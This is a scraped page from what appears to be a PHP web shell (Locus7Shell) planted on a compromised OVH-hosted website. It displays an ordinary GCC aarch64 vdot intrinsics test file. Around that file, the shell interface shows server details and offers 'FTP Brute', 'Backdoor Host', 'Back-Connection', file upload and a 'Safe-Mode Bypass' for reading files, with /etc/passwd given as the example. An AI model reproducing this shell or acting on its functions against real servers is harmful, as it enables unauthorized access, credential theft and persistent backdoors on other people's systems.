Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64
 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/image/photo/gcc-12.3.0/gcc/testsuite/gcc.target/aarch64/advsimd-intrinsics/   drwxr-xr-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     vdot-exec.c (3.11 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/* { dg-skip-if "can't compile on arm." { arm*-*-* } } */
/* { dg-do run { target { aarch64*-*-* } } } */
/* { dg-additional-options "-O3 -march=armv8.2-a+dotprod" } */
/* { dg-require-effective-target arm_v8_2a_dotprod_neon_hw } */

#include <arm_neon.h>

extern void abort();

#if __BYTE_ORDER__ == __ORDER_LITTLE_ENDIAN__
# define ORDER(x, y) y
#else
# define ORDER(x, y) x - y
#endif

#define P(n1,n2) n1,n1,n1,n1,n2,n2,n2,n2
#define ARR(nm, p, ty, ...) ty nm##_##p = { __VA_ARGS__ }
#define TEST(t1, t2, t3, f, r1, r2, n1, n2) \
    ARR(f, x, t1, r1);            \
    ARR(f, y, t2, r2);            \
    t3 f##_##r = {0};            \
    f##_##r = f (f##_##r, f##_##x, f##_##y);  \
    if (f##_##r[0] != n1 || f##_##r[1] != n2)   \
      abort ();

#define TEST_LANE(t1, t2, t3, f, r1, r2, n1, n2, n3, n4) \
    ARR(f, x, t1, r1);            \
    ARR(f, y, t2, r2);            \
    t3 f##_##rx = {0};            \
    f##_##rx = f (f##_##rx, f##_##x, f##_##y, ORDER (1, 0));  \
    if (f##_##rx[0] != n1 || f##_##rx[1] != n2)   \
      abort ();                    \
    t3 f##_##rx1 = {0};                \
    f##_##rx1 = f (f##_##rx1, f##_##x, f##_##y, ORDER (1, 1));  \
    if (f##_##rx1[0] != n3 || f##_##rx1[1] != n4)   \
      abort ();

#define Px(n1,n2,n3,n4) P(n1,n2),P(n3,n4)
#define TEST_LANEQ(t1, t2, t3, f, r1, r2, n1, n2, n3, n4, n5, n6, n7, n8) \
    ARR(f, x, t1, r1);            \
    ARR(f, y, t2, r2);            \
    t3 f##_##rx = {0};            \
    f##_##rx = f (f##_##rx, f##_##x, f##_##y, ORDER (3, 0));  \
    if (f##_##rx[0] != n1 || f##_##rx[1] != n2)   \
      abort ();                    \
    t3 f##_##rx1 = {0};                \
    f##_##rx1 = f (f##_##rx1, f##_##x, f##_##y, ORDER (3, 1));  \
    if (f##_##rx1[0] != n3 || f##_##rx1[1] != n4)   \
      abort (); \
    t3 f##_##rx2 = {0};                    \
    f##_##rx2 = f (f##_##rx2, f##_##x, f##_##y, ORDER (3, 2));  \
    if (f##_##rx2[0] != n5 || f##_##rx2[1] != n6)   \
      abort ();                    \
    t3 f##_##rx3 = {0};                \
    f##_##rx3 = f (f##_##rx3, f##_##x, f##_##y, ORDER (3, 3));  \
    if (f##_##rx3[0] != n7 || f##_##rx3[1] != n8)   \
      abort ();

int
main()
{
  TEST (uint8x8_t, uint8x8_t, uint32x2_t, vdot_u32, P(1,2), P(2,3), 8, 24);
  TEST (int8x8_t, int8x8_t, int32x2_t, vdot_s32, P(1,2), P(-2,-3), -8, -24);

  TEST (uint8x16_t, uint8x16_t, uint32x4_t, vdotq_u32, P(1,2), P(2,3), 8, 24);
  TEST (int8x16_t, int8x16_t, int32x4_t, vdotq_s32, P(1,2), P(-2,-3), -8, -24);

  TEST_LANE (uint8x8_t, uint8x8_t, uint32x2_t, vdot_lane_u32, P(1,2), P(2,3), 8, 16, 12, 24);
  TEST_LANE (int8x8_t, int8x8_t, int32x2_t, vdot_lane_s32, P(1,2), P(-2,-3), -8, -16, -12, -24);

  TEST_LANE (uint8x16_t, uint8x8_t, uint32x4_t, vdotq_lane_u32, P(1,2), P(2,3), 8, 16, 12, 24);
  TEST_LANE (int8x16_t, int8x8_t, int32x4_t, vdotq_lane_s32, P(1,2), P(-2,-3), -8, -16, -12, -24);

  TEST_LANEQ (uint8x8_t, uint8x16_t, uint32x2_t, vdot_laneq_u32, P(1,2), Px(2,3,1,4), 8, 16, 12, 24, 4, 8, 16, 32);
  TEST_LANEQ (int8x8_t, int8x16_t, int32x2_t, vdot_laneq_s32, P(1,2), Px(-2,-3,-1,-4), -8, -16, -12, -24, -4, -8, -16, -32);

  TEST_LANEQ (uint8x16_t, uint8x16_t, uint32x4_t, vdotq_laneq_u32, Px(1,2,2,1), Px(2,3,1,4), 8, 16, 12, 24, 4, 8, 16, 32);
  TEST_LANEQ (int8x16_t, int8x16_t, int32x4_t, vdotq_laneq_s32, Px(1,2,2,1), Px(-2,-3,-1,-4), -8, -16, -12, -24, -4, -8, -16, -32);

  return 0;
}

Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 

Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0057 ]--